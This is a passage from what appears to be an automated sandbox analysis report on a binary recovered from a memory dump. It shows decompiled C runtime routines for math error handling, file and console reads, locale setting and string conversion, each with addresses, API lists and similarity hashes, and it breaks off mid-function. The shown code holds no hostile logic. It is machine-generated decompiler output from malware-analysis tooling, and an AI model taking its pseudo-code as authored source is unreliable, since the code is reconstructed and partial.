Function 004234C7, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00425818), ref: 004234EA

Strings

exp, xrefs: 004235AF, 00423611
sqrt, xrefs: 0042366E
log, xrefs: 00423590, 0042359C
asin, xrefs: 00423656
log10, xrefs: 00423534, 00423584
acos, xrefs: 00423662
pow, xrefs: 004235CE, 0042367A, 0042368D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 4f80ca79684496cb8dcc510635052c9310e01c2c3b5d8b57bcb51cd04f3a5546
Instruction ID: 24b5c0ccc2701b480b3f0b98b8a4bf3bc547ebd2c6ab8de244ad1aee4e3e2889
Opcode Fuzzy Hash: 4f80ca79684496cb8dcc510635052c9310e01c2c3b5d8b57bcb51cd04f3a5546
Instruction Fuzzy Hash: 90514D71B00529EBCB20DF58F94C1ADBBB4FF08305F914596E441A6364CB7D8E668B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0042236B, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042236B(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00413C1A();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00413C2D())) = 9;
						L59:
						_t145 = E00413708();
						goto L60;
					}
					__eflags = _t213 -  *0x439c78; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x439a78 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00415216(_t224, _t158);
								E004155C5(0);
								E004155C5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0041B8B1(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x439a78 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x439a78 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x439a78 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x439a78 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x439a78 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x439a78 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x439a78 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00421BA2(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00413BF7(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00413C2D())) = 9;
											 *(E00413C1A()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x439a78 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00421EC7();
												} else {
													_t176 = E004221D7();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00422087(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x439a78 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00413C2D())) = 0xc;
									 *(E00413C1A()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E004155C5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00413C1A()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00413C2D())) = 0x16;
							E00413708();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00413C1A()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00413C2D())) = 0x16;
					goto L59;
				} else {
					 *(E00413C1A()) =  *_t212 & 0x00000000;
					_t145 = E00413C2D();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x00422374
0x0042237b
0x00422395
0x00422397
0x004226ff
0x004226ff
0x00422704
0x00422704
0x0042270c
0x00422712
0x00422712
0x00000000
0x00422712
0x0042239d
0x004223a3
0x00000000
0x00000000
0x004223ab
0x004223b7
0x004223ba
0x004223bd
0x004223c0
0x004223c7
0x004223ca
0x004223ce
0x004223d1
0x004223d4
0x00000000
0x00000000
0x004223da
0x004223dd
0x004223e3
0x004223fd
0x004223ff
0x004226fb
0x00000000
0x004226fb
0x00422405
0x00422409
0x00000000
0x00000000
0x0042240f
0x00422413
0x00000000
0x00000000
0x0042241a
0x0042241e
0x00422421
0x00422424
0x00422429
0x00422429
0x0042242c
0x00422449
0x0042244e
0x00422450
0x00422452
0x00422472
0x00422473
0x00422475
0x00422478
0x0042247a
0x0042247c
0x0042247e
0x0042247e
0x00422489
0x0042248b
0x00422492
0x00422497
0x0042249a
0x0042249d
0x0042249f
0x004224c4
0x004224c9
0x004224d0
0x004224d3
0x004224d6
0x004224da
0x004224dc
0x004224e0
0x004224e2
0x004224e5
0x004224e8
0x004224ea
0x004224ed
0x004224f4
0x004224f7
0x004224fc
0x004224ff
0x00422508
0x0042250c
0x0042250f
0x00422512
0x00422515
0x0042251b
0x0042251d
0x00422526
0x00422529
0x0042252c
0x0042252f
0x00422530
0x00422534
0x0042253a
0x00422544
0x00422549
0x00422559
0x0042255d
0x00422560
0x00422562
0x00422564
0x00422566
0x00422568
0x00422570
0x00422571
0x00422574
0x00422577
0x00422578
0x0042257e
0x00422588
0x00422590
0x00422593
0x0042259f
0x004225a3
0x004225a6
0x004225a8
0x004225aa
0x004225ac
0x004225ae
0x004225b6
0x004225b7
0x004225ba
0x004225bd
0x004225bd
0x004225be
0x004225c4
0x004225ce
0x004225ce
0x004225ac
0x004225a8
0x00422593
0x00422566
0x00422562
0x00422549
0x0042251d
0x00422515
0x004225d4
0x004225da
0x004225dc
0x0042264f
0x0042264f
0x00422653
0x00422663
0x00422669
0x0042266b
0x004226c7
0x004226c7
0x004226cf
0x004226d0
0x004226d2
0x004226eb
0x004226ee
0x0042262b
0x0042262c
0x00000000
0x00422631
0x004226f4
0x00000000
0x004226f4
0x004226d9
0x004226e4
0x00000000
0x004226e4
0x0042266d
0x00422670
0x00422673
0x00000000
0x00000000
0x00422675
0x00422675
0x00422678
0x0042267b
0x0042267e
0x00422685
0x0042268a
0x0042268c
0x00422690
0x004226ab
0x004226af
0x004226b0
0x004226b3
0x004226b4
0x004226c0
0x004226b6
0x004226b6
0x004226b6
0x00422692
0x00422692
0x00422692
0x0042269d
0x004226a2
0x004226a5
0x004226a5
0x00000000
0x0042268a
0x004225e1
0x004225e4
0x004225eb
0x004225f0
0x00000000
0x00000000
0x004225f9
0x004225ff
0x00422601
0x00000000
0x00000000
0x00422603
0x00422607
0x00000000
0x00000000
0x0042261b
0x00422621
0x00422623
0x00422647
0x0042264a
0x00000000
0x0042264a
0x00422625
0x00000000
0x004224a1
0x004224a6
0x004224b1
0x00422632
0x00422632
0x00422632
0x00422635
0x00422636
0x00000000
0x0042263e
0x0042249f
0x00422454
0x00422459
0x00422460
0x00422466
0x00000000
0x00422466
0x0042242e
0x00422431
0x0042243b
0x0042243b
0x0042243e
0x00422441
0x00000000
0x00422441
0x00422435
0x00422437
0x00422439
0x00000000
0x00000000
0x00000000
0x00422439
0x004223e5
0x004223ea
0x004223f2
0x00000000
0x0042237d
0x00422382
0x00422385
0x0042238a
0x00422717
0x00000000
0x00422717

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9976975ce0d0b8de6e13dbf2609229ca24ae459894b53820a693c58c2dd1df
Instruction ID: 9faede3adb2d912e5d4fb087712c5af193e3782177f199d2cb9d30420e4bade6
Opcode Fuzzy Hash: 0f9976975ce0d0b8de6e13dbf2609229ca24ae459894b53820a693c58c2dd1df
Instruction Fuzzy Hash: 87C1F471E04255BFDF11DFA8E941BEEBBB0AF09300F54415AE510A7392C7B89D81CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004177B5, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E004177B5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				intOrPtr _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t163;
				signed int _t165;
				signed int _t166;
				intOrPtr _t168;
				signed int _t171;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				signed int _t193;
				signed int _t194;
				signed int _t197;
				signed int _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr* _t211;
				signed int _t222;
				intOrPtr _t225;
				intOrPtr* _t226;
				signed int _t228;
				signed int* _t232;
				signed int _t239;
				void* _t240;
				signed int _t241;
				intOrPtr _t243;
				signed int _t248;
				signed int _t250;
				signed int _t254;
				signed int* _t255;
				intOrPtr* _t256;
				short _t257;
				signed int _t259;
				signed int _t261;
				void* _t263;
				void* _t265;

				_t259 = _t261;
				_t149 =  *0x438070; // 0xf2c84916
				_v8 = _t149 ^ _t259;
				_push(__ebx);
				_t204 = _a8;
				_push(__esi);
				_push(__edi);
				_t243 = _a4;
				_v744 = _t204;
				_v728 = E00418C71(_t204, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E00416EFF(_t204, __edx, _t243, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t263 = _t261 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t204 + 2; // 0x8
					_t248 = _t11 << 4;
					__eflags = _t248;
					_t157 =  &_v272;
					_v716 = _t248;
					_t239 =  *(_t248 + _t243);
					_t210 = _t239;
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t210;
						_t250 = _v716;
						if( *_t157 !=  *_t210) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t257 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t257 -  *((intOrPtr*)(_t210 + 2));
							_v710 = _t257;
							_t250 = _v716;
							if(_t257 !=  *((intOrPtr*)(_t210 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t210 = _t210 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t211 =  &_v272;
							_t240 = _t211 + 2;
							do {
								_t159 =  *_t211;
								_t211 = _t211 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t211 - _t240 >> 1) + 1;
							_t162 = E00415216(_t211 - _t240 >> 1, 4 + ((_t211 - _t240 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t250 + _t243));
								_t35 = _t204 * 4; // 0x982d
								_v736 =  *((intOrPtr*)(_t243 + _t35 + 0xa0));
								_t38 = _t243 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t220 =  &_v272;
								_v712 = _t162 + 4;
								_t165 = E004155FF(_t162 + 4, _v720,  &_v272);
								_t265 = _t263 + 0xc;
								__eflags = _t165;
								if(_t165 != 0) {
									_t166 = _v704;
									_push(_t166);
									_push(_t166);
									_push(_t166);
									_push(_t166);
									_push(_t166);
									E00413735();
									asm("int3");
									_t168 =  *0x439a70; // 0x0
									return _t168;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t250 + _t243)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t171 = E00416C0C(_t204, _t220, _t243,  &_v700);
										_t222 = _v704;
										 *(_t243 + 0xa0 + _t204 * 4) = _t171;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t222 = _v704;
											 *(_t243 + 0xa0 + _t204 * 4) = _t222;
										}
									}
									__eflags = _t204 - 2;
									if(_t204 != 2) {
										__eflags = _t204 - 1;
										if(_t204 != 1) {
											__eflags = _t204 - 5;
											if(_t204 == 5) {
												 *((intOrPtr*)(_t243 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t243 + 0x10)) = _v708;
										}
									} else {
										_t255 = _v728;
										_t241 = _t222;
										_t232 = _t255;
										 *(_t243 + 8) = _v708;
										_v712 = _t255;
										_v720 = _t255[8];
										_v708 = _t255[9];
										while(1) {
											_t64 = _t243 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t232;
											if( *_t64 ==  *_t232) {
												break;
											}
											_t256 = _v712;
											_t241 = _t241 + 1;
											_t202 =  *_t232;
											 *_t256 = _v720;
											_v708 = _t232[1];
											_t232 = _t256 + 8;
											 *((intOrPtr*)(_t256 + 4)) = _v708;
											_t204 = _v744;
											_t255 = _v728;
											_v720 = _t202;
											_v712 = _t232;
											__eflags = _t241 - 5;
											if(_t241 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t241 - 5;
											if(__eflags == 0) {
												_t88 = _t243 + 8; // 0x8b56ff8b
												_t193 = E0041C7F9(__eflags, _v704, 1, 0x42c598, 0x7f,  &_v528,  *_t88, 1);
												_t265 = _t265 + 0x1c;
												__eflags = _t193;
												_t194 = _v704;
												if(_t193 == 0) {
													_t255[1] = _t194;
												} else {
													do {
														 *(_t259 + _t194 * 2 - 0x20c) =  *(_t259 + _t194 * 2 - 0x20c) & 0x000001ff;
														_t194 = _t194 + 1;
														__eflags = _t194 - 0x7f;
													} while (_t194 < 0x7f);
													_t197 = E0040D704( &_v528,  *0x4381e0, 0xfe);
													_t265 = _t265 + 0xc;
													__eflags = _t197;
													_t255[1] = 0 | _t197 == 0x00000000;
												}
												_t103 = _t243 + 8; // 0x8b56ff8b
												 *_t255 =  *_t103;
											}
											 *(_t243 + 0x18) = _t255[1];
											goto L38;
										}
										__eflags = _t241;
										if(_t241 != 0) {
											 *_t255 =  *(_t255 + _t241 * 8);
											_t255[1] =  *(_t255 + 4 + _t241 * 8);
											 *(_t255 + _t241 * 8) = _v720;
											 *(_t255 + 4 + _t241 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t172 = _t204 * 0xc;
									_t110 = _t172 + 0x42c4d8; // 0x404797
									 *0x427198(_t243);
									_t174 =  *((intOrPtr*)( *_t110))();
									_t225 = _v724;
									__eflags = _t174;
									if(_t174 == 0) {
										__eflags = _t225 - 0x4382e0;
										if(_t225 == 0x4382e0) {
											L43:
											_t175 = _v716;
										} else {
											_t254 = _t204 + _t204;
											__eflags = _t254;
											asm("lock xadd [eax], ecx");
											if(_t254 != 0) {
												goto L43;
											} else {
												_t128 = _t254 * 8; // 0x30ff068b
												E004155C5( *((intOrPtr*)(_t243 + _t128 + 0x28)));
												_t131 = _t254 * 8; // 0x30ff0c46
												E004155C5( *((intOrPtr*)(_t243 + _t131 + 0x24)));
												_t134 = _t204 * 4; // 0x982d
												E004155C5( *((intOrPtr*)(_t243 + _t134 + 0xa0)));
												_t175 = _v716;
												_t228 = _v704;
												 *(_t175 + _t243) = _t228;
												 *(_t243 + 0xa0 + _t204 * 4) = _t228;
											}
										}
										_t226 = _v732;
										 *_t226 = 1;
										_t163 =  *(_t175 + _t243);
										 *((intOrPtr*)(_t243 + 0x28 + (_t204 + _t204) * 8)) = _t226;
									} else {
										 *((intOrPtr*)(_v716 + _t243)) = _t225;
										_t115 = _t204 * 4; // 0x982d
										E004155C5( *((intOrPtr*)(_t243 + _t115 + 0xa0)));
										 *(_t243 + 0xa0 + _t204 * 4) = _v736;
										E004155C5(_v732);
										 *(_t243 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							_t163 = _t239;
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					_t163 = 0;
					L2:
					E0040AEA8();
					return _t163;
				}
				L47:
			}

0x004177b8
0x004177c0
0x004177c7
0x004177ca
0x004177cb
0x004177ce
0x004177d2
0x004177d3
0x004177d6
0x004177e6
0x004177f2
0x00417809
0x0041780e
0x00417813
0x00417828
0x0041782b
0x0041782b
0x0041782e
0x00417834
0x0041783a
0x0041783d
0x0041783f
0x00417842
0x00417849
0x0041784c
0x00417852
0x00000000
0x00000000
0x00417854
0x00417858
0x00417881
0x00417881
0x0041785a
0x0041785a
0x0041785e
0x00417862
0x00417869
0x0041786f
0x00000000
0x00417871
0x00417871
0x00417874
0x00417877
0x0041787f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041787f
0x0041786f
0x0041788e
0x0041788e
0x00417890
0x00417896
0x0041789c
0x0041789f
0x0041789f
0x004178a2
0x004178a5
0x004178a5
0x004178b5
0x004178c3
0x004178c8
0x004178cf
0x004178d1
0x00000000
0x004178d7
0x004178dd
0x004178e3
0x004178ea
0x004178f0
0x004178f3
0x004178f9
0x00417906
0x0041790d
0x00417912
0x00417915
0x00417917
0x00417b70
0x00417b76
0x00417b77
0x00417b78
0x00417b79
0x00417b7a
0x00417b7b
0x00417b80
0x00417b81
0x00417b86
0x0041791d
0x0041791d
0x0041792b
0x0041792e
0x00417949
0x00417950
0x00417956
0x0041795c
0x00417930
0x00417930
0x00417938
0x00000000
0x0041793a
0x0041793a
0x00417940
0x00417940
0x00417938
0x00417963
0x00417966
0x00417a83
0x00417a86
0x00417a93
0x00417a96
0x00417a9e
0x00417a9e
0x00417a88
0x00417a8e
0x00417a8e
0x0041796c
0x0041796c
0x00417972
0x0041797a
0x0041797c
0x0041797f
0x00417988
0x00417991
0x00417997
0x00417997
0x0041799a
0x0041799c
0x00000000
0x00000000
0x0041799e
0x004179a4
0x004179a5
0x004179b0
0x004179b8
0x004179c0
0x004179c3
0x004179c6
0x004179cc
0x004179d2
0x004179d8
0x004179de
0x004179e1
0x00000000
0x00000000
0x004179e3
0x00417a08
0x00417a08
0x00417a0b
0x00417a0f
0x00417a28
0x00417a2d
0x00417a30
0x00417a32
0x00417a38
0x00417a73
0x00417a3a
0x00417a3a
0x00417a3f
0x00417a47
0x00417a48
0x00417a48
0x00417a5f
0x00417a66
0x00417a69
0x00417a6e
0x00417a6e
0x00417a76
0x00417a79
0x00417a79
0x00417a7e
0x00000000
0x00417a7e
0x004179e5
0x004179e7
0x004179ec
0x004179f2
0x004179fb
0x00417a04
0x00417a04
0x00000000
0x004179e7
0x00417aa1
0x00417aa1
0x00417aa5
0x00417aad
0x00417ab3
0x00417ab6
0x00417abc
0x00417abe
0x00417afe
0x00417b04
0x00417b50
0x00417b50
0x00417b06
0x00417b0b
0x00417b0b
0x00417b11
0x00417b15
0x00000000
0x00417b17
0x00417b17
0x00417b1b
0x00417b20
0x00417b24
0x00417b29
0x00417b30
0x00417b35
0x00417b3e
0x00417b44
0x00417b47
0x00417b47
0x00417b15
0x00417b56
0x00417b5e
0x00417b64
0x00417b67
0x00417ac0
0x00417ac6
0x00417ac9
0x00417ad0
0x00417ae2
0x00417ae9
0x00417af6
0x00000000
0x00417af6
0x00000000
0x00417abe
0x00417917
0x00417892
0x00417892
0x00000000
0x00417892
0x00000000
0x00417890
0x00417889
0x0041788b
0x0041788b
0x00000000
0x00417815
0x00417815
0x00417815
0x00417817
0x0041781f
0x00417827
0x00417827
0x00000000

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

_memcmp.LIBVCRUNTIME ref: 00417A5F
_free.LIBCMT ref: 00417AD0
_free.LIBCMT ref: 00417AE9
_free.LIBCMT ref: 00417B1B
_free.LIBCMT ref: 00417B24
_free.LIBCMT ref: 00417B30

Strings

C, xrefs: 0041791D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 7d0dea4305a2a84a9affa59128a507eba3582751bfdfdb0d73320dd59c8ca73c
Instruction ID: 658fbceac3766c0b177b3184e039b9eb029d5f53a519c939a41499b4b938060a
Opcode Fuzzy Hash: 7d0dea4305a2a84a9affa59128a507eba3582751bfdfdb0d73320dd59c8ca73c
Instruction Fuzzy Hash: 85B10775A052199FDB24DF18C888AEEB7B5FF48304F1045AEE949A7350E735AE90CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B938, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041B938(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x438070; // 0xf2c84916
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004155A9(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E0040AEA8();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E0040A0BC(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E0041A308(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E0040A0BC(_t99);
									goto L36;
								}
								_t60 = E0041A308(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
